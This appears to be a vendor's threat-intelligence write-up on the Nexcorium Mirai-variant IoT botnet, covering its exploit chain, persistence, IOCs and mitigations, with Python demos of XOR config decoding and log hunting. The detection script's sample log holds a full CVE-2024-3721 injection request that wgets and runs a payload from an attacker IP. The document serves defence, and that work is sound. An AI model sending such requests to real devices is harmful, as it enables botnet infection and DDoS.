
Inside Nexcorium: How CVE-2024-3721 Fuels a New Wave of Mirai-Based DDoS Botnets

Researchers have uncovered an active IoT botnet campaign exploiting two known command-injection vulnerabilities to recruit surveillance cameras and home routers into a distributed denial-of-service (DDoS) army. Dubbed Nexcorium, this new Mirai variant uses CVE-2024-3721, an OS command-injection flaw in TBK DVR devices, as its primary entry point. Once inside, it pivots outward using a bundled exploit for CVE-2017-17215 targeting Huawei HG532 routers, then floods victim hosts with UDP, TCP, and SMTP traffic.

The goal of this operation is straightforward but damaging: hijack unpatched IoT devices at scale, build a persistent multi-architecture botnet, and weaponize that infrastructure for large-scale denial-of-service attacks against victim targets.


Vulnerabilities & Affected Products

The campaign chains two command injection vulnerabilities:

CVE-2024-3721
  Vulnerability type: OS Command Injection (CWE-78)
  CVSS score: 6.3 (Medium)
  EPSS score: 83.86%
  Affected products: TBK DVR-4104 and DVR-4216 (firmware <= 20240412)
  Fixed version: No official vendor patch published
  Attack vector: Network; no authentication required in practice
  Exploit status: Publicly disclosed; actively exploited in the wild
  Role in campaign: Primary entry point into TBK DVR devices

CVE-2017-17215
  Vulnerability type: Command Injection via TR-064/UPnP (CWE-77)
  CVSS score: 8.8 (High)
  EPSS score: 92.92%
  Affected products: Huawei HG532 (all versions)
  Fixed version: Patch available (Huawei PSIRT SN-20171130-01)
  Attack vector: Network; targets TCP port 37215 (UPnP)
  Exploit status: Publicly disclosed since 2017; integrated into multiple Mirai variants
  Role in campaign: Lateral movement to Huawei routers after initial compromise

Attack Methodology: The Automated Infection Chain

Unlike traditional intrusions that rely on a user clicking a link or entering credentials on a spoofed page, Nexcorium operates entirely through automated vulnerability exploitation. Once a TBK DVR is internet-reachable, no human interaction is required for the full infection lifecycle to complete.

Initial Exploitation: Attackers send a crafted POST request to the /device.rsp API endpoint of exposed TBK DVR devices, manipulating the mdb and mdc parameters to inject shell commands. The endpoint passes these values to the shell without sanitization and, in practice, without requiring authentication, so the attack is reliable across the affected firmware versions.

Downloader Delivery: The injected command downloads a script named dvr from attacker-controlled infrastructure. This script identifies the host device’s CPU architecture, then fetches the matching Nexcorium payload — filenames follow the pattern nexuscorp.* (e.g., nexuscorp.arm, nexuscorp.mips, nexuscorp.x86). Upon execution, the malware displays “nexuscorp has taken control” in the system console.

Payload Unpacking: Nexcorium uses XOR decoding to unpack its embedded configuration table, which contains the C2 server domain and port, persistence shell commands, a hardcoded brute-force credential list, DDoS attack parameters, and the bundled CVE-2017-17215 exploit code.

Persistence: Rather than relying on a single persistence method, the malware establishes four simultaneous footholds: modifying /etc/inittab for automatic process restarts, updating /etc/rc.local for execution at system boot, creating a persist.service systemd unit for background operation, and planting crontab entries for scheduled re-execution. After completing this setup, Nexcorium deletes its original binary to obstruct forensic analysis.

Lateral Movement: The malware immediately begins scanning the local network. It brute-forces Telnet interfaces on neighboring devices using a hardcoded list of common default credentials (including admin123, 12345, and guest). It also fires the bundled CVE-2017-17215 exploit against reachable Huawei HG532 routers — injecting shell metacharacters into SOAP XML fields to achieve remote code execution and deploy copies of itself.

C2 and DDoS Launch: Infected devices connect to the command-and-control server and await instructions. On command, they participate in volumetric DDoS attacks, flooding victim hosts via UDP, TCP, and SMTP traffic simultaneously.
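
The XOR-packed configuration table in the Payload Unpacking step is the same mechanism the original Mirai source uses, and the following added example (written for this article, not Nexcorium's or Mirai's own code) shows how such a table is built, how the bot unlocks an entry on demand, and how an analyst recovers the key from a dumped binary using a known plaintext such as the C2 TLD. The entry layout and the 0xDEADBEEF key are those of the leaked Mirai source (table.c); Nexcorium's own key, field order and values are not given in this write-up, so the sample entries are constructed.

```python
"""Mirai-style XOR config table: lock, unlock, and key recovery.

Added example written for this article; it is not Nexcorium's or Mirai's
code. The entry layout and the key 0xDEADBEEF follow the leaked Mirai
source (table.c), where each config string sits XOR-obfuscated in the
binary and is decoded only while in use. Nexcorium's real key, entry order
and values are not given on this page; the entries below are constructed.
"""
from __future__ import annotations

import struct

MIRAI_TABLE_KEY = 0xDEADBEEF  # original Mirai key; an assumption for Nexcorium

# Constructed sample config: the article names these field types, not values.
SAMPLE_CONFIG = {
    "cnc_domain": "r3brqw3d.b0ats.top",
    "cnc_port": "443",
    "persist_cmd": "cp /tmp/nexuscorp.arm /usr/bin/persist",
    "creds": "admin:admin123,root:12345,guest:guest",
}


def fold_key(key: int) -> int:
    """Mirai XORs every byte with k1, k2, k3 and k4 in turn; since XOR is
    associative this collapses to a single byte (0x22 for 0xDEADBEEF)."""
    k = 0
    for b in struct.pack("<I", key):
        k ^= b
    return k


def toggle_obf(data: bytes, key: int = MIRAI_TABLE_KEY) -> bytes:
    """One routine serves both lock and unlock: XOR is its own inverse."""
    k = fold_key(key)
    return bytes(b ^ k for b in data)


def build_table(config: dict[str, str], key: int = MIRAI_TABLE_KEY) -> bytes:
    """Serialize entries as uint16 LE length followed by the obfuscated
    bytes; strings keep their trailing NUL as the C code expects."""
    out = bytearray()
    for value in config.values():
        obf = toggle_obf(value.encode() + b"\x00", key)
        out += struct.pack("<H", len(obf)) + obf
    return bytes(out)


def parse_table(blob: bytes, names: list[str], key: int = MIRAI_TABLE_KEY) -> dict[str, str]:
    """Walk the table and unlock each entry (table_unlock_val, then read)."""
    off, result = 0, {}
    for name in names:
        (length,) = struct.unpack_from("<H", blob, off)
        off += 2
        plain = toggle_obf(blob[off:off + length], key)
        off += length
        result[name] = plain.rstrip(b"\x00").decode()
    return result


def recover_xor_byte(blob: bytes, known_plaintext: bytes) -> int | None:
    """Analyst shortcut: a single-byte XOR key falls to brute force. Try all
    256 candidates and keep the one that reveals a known substring."""
    for k in range(256):
        if known_plaintext in bytes(b ^ k for b in blob):
            return k
    return None


def demo() -> dict[str, str]:
    blob = build_table(SAMPLE_CONFIG)
    assert b"b0ats" not in blob               # strings(1) on the binary sees nothing
    k = recover_xor_byte(blob, b".top\x00")   # the C2 TLD is a safe known plaintext
    assert k == fold_key(MIRAI_TABLE_KEY)
    return parse_table(blob, list(SAMPLE_CONFIG))


if __name__ == "__main__":
    print(demo())
```

Because the effective key is one byte, the table hides strings from a casual strings(1) pass but not from an analyst: a single known token (the C2 TLD, "/bin/busybox", a credential) is enough to recover it and dump the whole table.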


MITRE ATT&CK: Tactics and Techniques

TA0001 Initial Access
  T1190 – Exploit Public-Facing Application: exploiting CVE-2024-3721 OS command injection in the TBK DVR web interface
TA0002 Execution
  T1059.004 – Unix Shell: injecting shell commands via the unsanitized mdb/mdc parameters to run the downloader script
TA0003 Persistence
  T1543.002 – Systemd Service: creating persist.service as an automatic background systemd unit, reinforced via inittab, rc.local, and crontab
TA0005 Defense Evasion
  T1070.004 – File Deletion: deleting the original binary post-execution to frustrate forensic analysis
TA0006 Credential Access
  T1110.001 – Password Guessing: brute-forcing Telnet interfaces using a hardcoded list of common default credentials
TA0008 Lateral Movement
  T1210 – Exploitation of Remote Services: deploying the CVE-2017-17215 exploit against Huawei HG532 devices to propagate the botnet
TA0040 Impact
  T1498 – Network Denial of Service: launching simultaneous UDP, TCP, and SMTP flood attacks against victim hosts

Indicators of Compromise (IOCs)

The following infrastructure and artifacts have been identified by FortiGuard Labs as being used in the Nexcorium campaign:

IP addresses:       84[.]200[.]87[.]36, 176[.]65[.]148[.]186
Domain (C2):        r3brqw3d[.]b0ats[.]top
HTTP header:        X-Hacked-By: Nexus Team – Exploited By Erratic
Filename pattern:   nexuscorp.* (nexuscorp.arm, nexuscorp.mips, nexuscorp.x86)
Downloader script:  dvr
Systemd service:    persist.service
Exploit endpoint:   POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___

Visual Attack Flow

[Attacker Sends Crafted POST to TBK DVR /device.rsp Endpoint]
-> [CVE-2024-3721 OS Command Injection Executes Without Authentication]
-> [Downloader Script "dvr" Fetched and Executed on Victim Device]
-> [Architecture-Matched "nexuscorp.*" Payload Deployed (ARM/MIPS/x86)]
-> [XOR Configuration Table Unpacked: C2, Exploit Code, Brute-Force List]
-> [Four-Layer Persistence Established: inittab, rc.local, systemd, crontab]
-> [Original Binary Deleted to Obstruct Forensic Analysis]
-> [CVE-2017-17215 Fired at Huawei HG532 Routers for Lateral Movement]
-> [Telnet Brute-Force Against Neighboring IoT Devices with Default Credentials]
-> [Infected Devices Connect to C2 and Await DDoS Attack Commands]
-> [Volumetric DDoS Launched Against Victim Hosts via UDP, TCP, and SMTP]

Key Takeaways & Mitigation

Restrict DVR Exposure. No vendor patch has been published for CVE-2024-3721, so take internet-facing TBK DVR-4104 and DVR-4216 devices offline or place them behind a firewall or VPN immediately.

Patch Huawei HG532 Devices. Apply Huawei PSIRT patch SN-20171130-01 for CVE-2017-17215, or disable UPnP and block inbound traffic on TCP port 37215 if patching is not possible.

Eliminate Default Credentials. Nexcorium's brute-force module works from a hardcoded list of common default passwords, so setting a unique, strong password on every network-connected device before deployment defeats this vector.

Segment IoT Devices. Placing DVRs and cameras on isolated VLANs prevents a compromised device from using CVE-2017-17215 or Telnet brute-forcing to pivot into critical network assets.

Monitor for Anomalies. Alert on outbound connections to b0ats[.]top, unexpected binaries in /tmp, or the appearance of persist.service in systemd output.
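
To make the monitoring advice concrete, here is an added example (not the researchers' or the author's tooling) that hunts the indicators from the IOC table in three places: inbound requests to the DVR web interface, resolver and flow logs for the C2 zone and addresses, and the four persistence locations on a device. The log formats and every sample line are constructed; the C2 port in the flow sample is an assumption, since the page gives none, and the look-alike name b0ats.top.example.org is included to show that zone matching must be by suffix, not substring.

```python
"""Hunt for the Nexcorium indicators listed in this article.

Added example for this write-up, not FortiGuard's or the author's tooling.
The indicators (C2 domain and IPs, exploit endpoint, nexuscorp.* names,
persist.service) come from the IOC table. The log formats (NCSA combined
access log, dnsmasq-style query log, 'src dst dport' flow records, text
dumps of inittab/rc.local/crontab and a unit list) and every sample line
are constructed for the demonstration; the C2 port 8443 is an assumption.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

C2_DOMAIN = "b0ats.top"               # covers r3brqw3d.b0ats.top and sibling hosts
C2_IPS = {"84.200.87.36", "176.65.148.186"}
EXPLOIT_PATH = "/device.rsp"
EXPLOIT_CMD = "___S_O_S_T_R_E_A_MAX___"
SHELL_META = re.compile(r"[;|&`$]")   # metacharacters that turn mdc into a command chain
ARTIFACT_RE = re.compile(r"nexuscorp\.(arm|mips|x86)\b|persist\.service|(^|\s)/tmp/\S+")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
DNS_RE = re.compile(r"query\[\w+\] (\S+) from (\S+)")

# Constructed samples: one exploit, one benign call, one bare probe; a C2
# lookup, a benign lookup and a look-alike that must NOT match; one flow to
# a C2 address; and persistence artifacts in all four locations.
ACCESS_LOG = [
    '84.200.87.36 - - [10/Jun/2025:14:02:11 +0000] "POST /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+/tmp%3Bwget+http://84.200.87.36/dvr%3Bsh+dvr HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Jun/2025:14:05:40 +0000] "GET /device.rsp?opt=sys&cmd=get_time HTTP/1.1" 200 128',
    '176.65.148.186 - - [10/Jun/2025:14:09:02 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ HTTP/1.1" 200 64',
]
DNS_LOG = [
    "Jun 10 14:03:01 gw dnsmasq[412]: query[A] r3brqw3d.b0ats.top from 192.168.20.14",
    "Jun 10 14:03:02 gw dnsmasq[412]: query[A] pool.ntp.org from 192.168.20.14",
    "Jun 10 14:03:09 gw dnsmasq[412]: query[A] b0ats.top.example.org from 192.168.20.15",
]
FLOWS = ["192.168.20.14 84.200.87.36 8443", "192.168.20.14 203.0.113.5 443"]
HOST_FILES = {
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/tmp/nexuscorp.arm\n",
    "/etc/rc.local": "#!/bin/sh\n/tmp/.x/nexuscorp.mips &\nexit 0\n",
    "/var/spool/cron/crontabs/root": "0 3 * * * /usr/sbin/logrotate\n@reboot /tmp/nexuscorp.arm\n",
    "systemctl list-unit-files": "persist.service enabled\nsshd.service enabled\n",
}


def classify_request(method: str, target: str, body: str = "") -> str | None:
    """'exploit', 'probe' or None for one request to a DVR.

    The CVE-2024-3721 request is a POST to /device.rsp carrying
    opt=sys&cmd=___S_O_S_T_R_E_A_MAX___; the injected command rides in mdc
    (mdb/mdc may sit in the query string or the body), so shell metacharacters
    in mdc separate a live exploit from a bare probe of the endpoint.
    """
    parts = urlsplit(target)
    if method.upper() != "POST" or parts.path != EXPLOIT_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))
    if params.get("cmd") != [EXPLOIT_CMD]:
        return None
    return "exploit" if SHELL_META.search("".join(params.get("mdc", []))) else "probe"


def scan_access_log(lines: list[str]) -> list[dict]:
    """Inbound view: exploitation attempts against the DVR web interface."""
    out = []
    for line in lines:
        m = ACCESS_RE.match(line)
        verdict = classify_request(m.group(2), m.group(3)) if m else None
        if verdict:
            out.append({"type": "cve-2024-3721-" + verdict, "src": m.group(1), "status": m.group(4)})
    return out


def scan_dns_log(lines: list[str]) -> list[dict]:
    """Outbound view: exact or subdomain match on the C2 zone, never a substring."""
    out = []
    for line in lines:
        m = DNS_RE.search(line)
        if m and (m.group(1) == C2_DOMAIN or m.group(1).endswith("." + C2_DOMAIN)):
            out.append({"type": "c2-dns", "host": m.group(2), "name": m.group(1)})
    return out


def scan_flows(lines: list[str]) -> list[dict]:
    """Outbound view: flow records whose destination is a listed C2 address."""
    return [{"type": "c2-flow", "src": s, "dst": d, "dport": p}
            for s, d, p in (l.split() for l in lines) if d in C2_IPS]


def scan_persistence(files: dict[str, str]) -> list[dict]:
    """Host view: bot names, the persist.service unit, or anything launched from /tmp."""
    return [{"type": "persistence", "file": path, "line": line.strip()}
            for path, text in files.items()
            for line in text.splitlines() if ARTIFACT_RE.search(line)]


def demo() -> dict[str, list[dict]]:
    return {
        "access": scan_access_log(ACCESS_LOG),
        "dns": scan_dns_log(DNS_LOG),
        "flows": scan_flows(FLOWS),
        "persistence": scan_persistence(HOST_FILES),
    }


if __name__ == "__main__":
    for kind, hits in demo().items():
        for hit in hits:
            print(kind, hit)
```

On a real device, feed scan_persistence the contents of /etc/inittab, /etc/rc.local, the root crontab and the output of systemctl list-unit-files; a hit in any of them is worth escalating even when the binary itself is gone, since Nexcorium deletes it after installing persistence.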


Instantly Fix Risks with Saner Patch Management

Saner patch management is continuous, automated, and integrated patch-management software that fixes risks exploited in the wild. It supports major operating systems such as Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.